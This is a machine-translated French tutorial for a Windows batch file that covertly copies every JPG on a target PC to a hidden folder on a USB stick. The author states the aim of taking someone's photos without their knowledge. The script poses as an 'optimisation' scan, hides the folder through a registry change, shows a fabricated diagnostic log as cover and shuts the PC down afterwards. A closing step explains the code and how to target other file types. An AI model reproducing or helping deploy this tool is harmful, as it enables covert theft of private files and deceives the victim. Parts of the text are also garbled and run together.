Fichier batch de copie de photo d'espion secret : 5 étapes

2024 Auteur: John Day | [email protected]. Dernière modifié: 2024-01-30 09:11

Alors, tout d'abord, quelle est cette création instructable et pourquoi. Cette instructable vous permettra de créer un fichier batch qui copiera toutes les images d'un PC sur votre clé USB. il le fera discrètement, se faisant passer pour un autre programme qui recherche des problèmes sur l'ordinateur. Une fois terminé, vous aurez un dossier caché sur votre clé USB avec toutes les images copiées. Pourquoi ? J'ai créé cette instructable parce que je voulais récupérer une photo numérique de la machine de quelqu'un sans qu'ils sachent que je l'avais fait. L'utilisation légitime de ce fichier vous permettra d'archiver/sauvegarder vos photos personnelles. Autres utilisations: Ce fichier peut être modifié pour permettre la copie de tout autre type de document.

Étape 1: écrivez le code

Copiez le code suivant dans le bloc-notes et enregistrez-le à la racine de votre clé USB en tant que fichier bat, vous pouvez le nommer comme vous le souhaitez tant qu'il a l'extension.bat. Pour vous assurer qu'il a la bonne extension, tapez-le comme suit dans la zone de sauvegarde du bloc-notes "copyimage.bat" (incluez les citations !)

@echo offecho Client d'optimisation 2008 v3.02becho --------------------------------echo.echo Veuillez ne pas utiliser votre PC pendant que cela est en cours d'exécution.echo.echo Liste des processus d'analyse. Une fois terminé, un journal s'affichera pour que votre administrateur système puisse examiner.echo.echo Veuillez patienter, cela peut prendre jusqu'à 3 heures.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nulmkdir \data >nulattrib +h \data >nulsetLocal EnableDelayedExpansion@echo offfor %%a in (jpg) do (for /f "tokens=* delims= " %%f in ('dir/b/s/ ad c:\*.%%a') do (xcopy "%%f" \data\ /y /h /q >nul))attrib -s +h data\* >nulstart optimisationLog.txtshutdown /s /c " Analyse d'optimisation terminée, votre PC va maintenant s'éteindre"

Étape 2: créer un faux fichier de rapport

Dans cette étape, j'ai créé un faux fichier texte qui prétend être le journal des résultats du fichier batch que nous exécutons pour copier les fichiers. Cela vous permet de prétendre que quelque chose s'est passé. Peu importe ce que dit ce fichier, vous pouvez le modifier autant que vous le souhaitez, assurez-vous simplement que le nom du fichier est correct et qu'il est stocké à la racine de votre carte mémoire. Le texte que j'ai utilisé provient principalement d'un détournement de ce log, copiez-le et enregistrez-le à la racine de votre clé USB en tant qu'optimisationLog.txt

Analyse terminée. Veuillez fermer ce journal et autoriser votre administrateur système à le consulter. Processus en cours d'exécution: C:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer. EXEC:\Program Files\Java\jre1. 6.0_07\bin\jusched.exeC:\Windows\System32\hkcmd.exeC:\Windows\System32\igfxpers.exeC:\Windows\system32\igfxsrvc.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\TOSHIBA\Power Saver\TPwrMain.exeC:\Program Files\TOSHIBA\SmoothView\SmoothView.exeC:\Program Files\TOSHIBA\FlashCards\TCrdMain.exeC:\Program Files\BitDefender\BitDefender 2009\bdagent.exeC:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exeC:\Program Files\Registry Mechanic\regmech.exeC:\Program Files\BitDefender\BitDefender 2009\seccenter.exeC:\Program Files\Synaptics\SynTP\SynTPHelper.exeC:\Program Files\ Vuze\Azureus.exeC:\Program Files\Microsoft Office\Office12\OUTLOOK. EXEC:\Program Files\AutoCAD 2008\acad.exeC:\Users\Tom\AppData\Local\Temp\AdskCleanup.0001C:\Program Files\Mozilla Firefox\firefox.exeC:\Windows\System32\REMARQUE PAD. EXEC:\Windows\system32\SearchFilterHost.exeC:\HijackThis\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU\Software\Microsoft \Internet Explorer\Main, page de recherche = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU\Software\Microsoft\Internet Explorer\Main, page de démarrage = https://www.google.co. ukR1 - HKLM\Software\Microsoft\Internet Explorer\Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM\Software\Microsoft\Internet Explorer\Main, Default_Search_URL = https://go.microsoft.com/ fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main, page de recherche = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main, Démarrer Page = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM\Software\Microsoft\Internet Explorer\Search, SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search, CustomizeSearch = R0 - HKCU \Software\Microsoft\Internet Explorer\Too lbar, LinksFolderName = O1 - Hôtes:::1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper2 -BHO.dll Assistant de navigateur Groove GFS - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dllO2 - BHO: classe SSVHelper - {761497BB-D6F0-462C-B6EB-D4DAF}:\Program Files\Java\jre1.6.0_07\bin\ssv.dllO3 - Barre d'outils: Barre d'outils BitDefender - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2009\IEToolbar.dllO4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hideO4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\ jusched.exe"O4 - HKLM\..\Exécutez: [IgfxTray] C:\Windows\system32\igfxtray.exeO4 - HKLM\..\Exécutez: [HotKeysCmds] C:\Windows\system32\hkcmd.exeO4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exeO4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Syna ptics\SynTP\SynTPEnh.exeO4 - HKLM\..\Run: [TPwrMain] %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain. EXEO4 - HKLM\..\Run: [SmoothView] %ProgramFiles%\Toshiba\SmoothView\SmoothView.exeO4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exeO4 - HKLM\..\Run: [Toshiba TEMPO] C:\Program Files\Toshiba TEMPRO\Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM\..\Run: [BDAgent] "C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe"O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2009\IEShow.exe"O4 - HKCU\..\Exécutez: [TOSCDSPD] C:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exeO4 - HKCU\..\Exécutez: [RegistryMechanic] C:\ Program Files\Registry Mechanic\RMTray.exe /HO4 - Démarrage: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM. EXEO8 - Élément de menu contextuel supplémentaire: E&xporter vers Microsoft Excel - res: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9 - Bouton supplémentaire: (pas de nom) - {08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C:\PROGRA~1\Java\JRE16~2.0_0\bin\ssv.dllO9 - Élément de menu "Outils" supplémentaire: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~ 1\Java\JRE16~2.0_0\bin\ssv.dllO9 - Bouton supplémentaire: Envoyer à OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Élément de menu "Outils" supplémentaire: Envoyer vers OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dllO9 - Bouton supplémentaire: eBay.co.uk - Acheter Ça se vend l'aime - {76577871-04EC-495E-A12B-91F7C3600AFA} - https://rover.ebay.com/rover/1/710-44557-9400-3/4 (fichier manquant)O9 - Bouton supplémentaire: (pas de nom) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (fichier manquant)O9 - Élément de menu "Outils" supplémentaire: Désinstaller BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669 -0800200c9a66} - %windir%\bdoscandel.exe (fichier manquant)O9 - Bouton supplémentaire: Amazon.co.uk - {8A918C1D-E123-4E36-B562-5C1519E434CE} - https://www.amazon.co.uk/ exec/obidos/redirect-home?tag=Toshibaukbholink-2 1&site=home (fichier manquant)O9 - Bouton supplémentaire: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR. DLLO10 - Fichier inconnu dans Winsock LSP: c:\windows\system32\nlaapi.dllO10 - Fichier inconnu dans Winsock LSP: c:\windows\system32\napinsp.dllO10 - Fichier inconnu dans Winsock LSP: c:\program files\vmware\vmwarestation de travail\vsocklib.dllO10 - Fichier inconnu dans Winsock LSP: c:\program files\vmware\vmwarestation de travail\vsocklib.dllO11 - Groupe d'options: [INTERNATIONAL] International*O13 - Préfixe Gopher: O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (classe get_atlcom) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - Protocole: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\ Microsoft Office\Office12\GrooveSystemServices.dllO18 - Protocole: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dllO18 - Hijack de filtre: text/ xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF. DLLO20 - Winlogon Notify: igfxcui - C:\Windows\SYSTEM32\igfxdev.dllO23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systèmes - C:\Windows\system32\agrsmsvc.exeO23 - Service: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\Arrakis3.exeO23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared \Service\AdskScSrv.exeO23 - Service: ConfigFree Service - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exeO23 - Service: @%SystemRoot%\ehome\ehstart.dll, -101 (ehstart) - Propriétaire inconnu - %windir%\system32\svchost.exe (fichier manquant)O23 - Service: getPlus(R) Helper - NOS Microsystems Ltd. - C:\Program Files\NOS\bin\getPlus_HelperSvc.exeO23 - Service: Google Update Service (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Propriétaire inconnu - C:\Program Files\Google\Update\GoogleUpdate.exe" /svc (fichier manquant)O23 - Service: BitDefender Desktop Update Service (LIVESRV) - Propriétaire inconnu - C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe" /service (fichier manquant)O23 - Service: @%SystemRoot%\system32\qwave.dll, -1 (QWAVE) - Propriété inconnue r - %windir%\system32\svchost.exe (fichier manquant)O23 - Service: @%SystemRoot%\system32\seclogon.dll, -7001 (seclogon) - Propriétaire inconnu - %windir%\system32\svchost.exe (fichier manquant)O23 - Service: Notebook Performance Tuning Service (TempoMonitoringService) - Toshiba Europe GmbH - C:\Program Files\Toshiba TEMPRO\TempoSVC.exeO23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\ TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exeO23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exeO23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - c:\ Program Files\TOSHIBA\Power Saver\TosCoSrv.exeO23 - Service: TOSHIBA SMART Log Service - TOSHIBA Corporation - c:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exeO23 - Service: VMware Agent Service (ufad-ws60) - Propriétaire inconnu - C:\Program Files\VMware\VMware Workstation\vmware-ufad.exe" -d "C:\Program Files\VMware\VMware Workstation\" -s ufad-p2v.x ml (fichier manquant)O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exeO23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files\VMware\VMware Workstation\vmware-authd.exeO23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\Windows\system32\vmnetdhcp.exeO23 - Service: VMware NAT Service - VMware, Inc. - C:\Windows\system32\vmnat.exeO23 - Service: BitDefender Virus Shield (VSSERV) - Propriétaire inconnu - C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe" /service (fichier manquant)O23 - Service: VNC Server Version 4 (WinVNC4) - Propriétaire inconnu - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (fichier manquant)O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe, -101 (WMPNetworkSvc) - Propriétaire inconnu - %ProgramFiles%\Windows Media Player\wmpnetwk.exe (fichier manquant)

Étape 3: Exécutez le programme

Vous devriez maintenant avoir une clé USB avec deux fichiers dessus (et beaucoup d'espace libre prêt pour les nouvelles images). Si vous avez autre chose sur le lecteur, cela n'a pas d'importance. Prenez la clé USB sur votre ordinateur cible. Lorsqu'il est enregistré, notez la lettre de lecteur qui lui est allouée, cela vous permettra de l'exécuter sans avoir besoin de parcourir d'abord le dossier. Appuyez sur la touche Windows puis appuyez sur 'R' (tout en maintenant la touche Windows enfoncée). Cela fera apparaître une boîte Exécuter. Dans la zone d'exécution, tapez le chemin du fichier batch que nous avons créé, la lettre de lecteur étant la lettre attribuée lorsque vous avez branché la clé USB. Par exemple, si j'insère ma clé USB et qu'elle enregistre ag:\ lecteur, je lancerais:g:\copyimage.batEt puis appuyez sur Entrée, ou cliquez sur Exécuter. Cela démarrera le fichier batch en cours d'exécution. Lorsqu'il est terminé, il arrête la machine. Retirez votre clé USB et emportez-la !

Étape 4: Obtenez les images

Vous devriez maintenant avoir une clé USB avec toutes les images dessus. Les fichiers et le dossier sont cachés, donc si vous n'avez pas le vôtre, vous devrez l'activer. Pour ce faire, allez dans une fenêtre d'explorateur (par exemple, ouvrez mon ordinateur) et: WinXP - Outils, Options des dossiers, Affichage, Afficher les fichiers cachésVista - Organiser, Options des dossiers et de recherche, Afficher, Afficher les fichiers cachés dossier caché et obtenez les images que vous vouliez!

Étape 5: ce que signifie le code

Je vais expliquer autant de code que possible. la fonction de copie principale n'a pas été écrite par moi, je l'ai empruntée au site suivant et l'ai modifiée:https://www.computing.net/answers/programming/search-with-batch-file/17171.htmlCODE

@echo off '' Arrête l'affichage des commandes à l'écran, afin que l'utilisateur ne sache pas ce qui est fait echo Optimization client 2008 v3.02b echo ------------------- -------------écho. Écrit à l'écran un titre pour le programme echo Veuillez ne pas utiliser votre PC pendant qu'il est en cours d'exécution.echo.echo Liste des processus de numérisation. Une fois terminé, un journal s'affichera pour que votre administrateur système puisse examiner.echo.echo Veuillez patienter, cela peut prendre jusqu'à 3 heures. Indique à l'utilisateur une charge d'ordures qui n'est pas vraie reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nul Ajoute une clé de registre qui masquera les fichiers cachés et Dossiers. Cela empêche l'utilisateur de voir le dossier que nous créons pour contenir les images copiées. La commande nul à la fin empêche la commande de signaler tout message lorsqu'elle se termine mkdir \data >nul Crée un dossier sur le lecteur dans lequel ce fichier batch réside sur les données appelées. attrib +h \data >nul Masque le dossier créé setLocal EnableDelayedExpansionfor %%a in (jpg) do (for /f "tokens=* delims= " %%f in ('dir/b/s/ad c:\*. %%a') do (xcopy "%%f" \data\ /y /h /q >nul)) C'est le code qui recherchera les images dans tout le lecteur c:\. Si vous voulez qu'il recherche un autre lecteur, remplacez la partie c: par ce que vous voulez. Si vous voulez qu'il trouve d'autres types de fichiers, listez-les à côté du texte jpg, séparez les types de fichiers par un espace. Par exemple-j.webp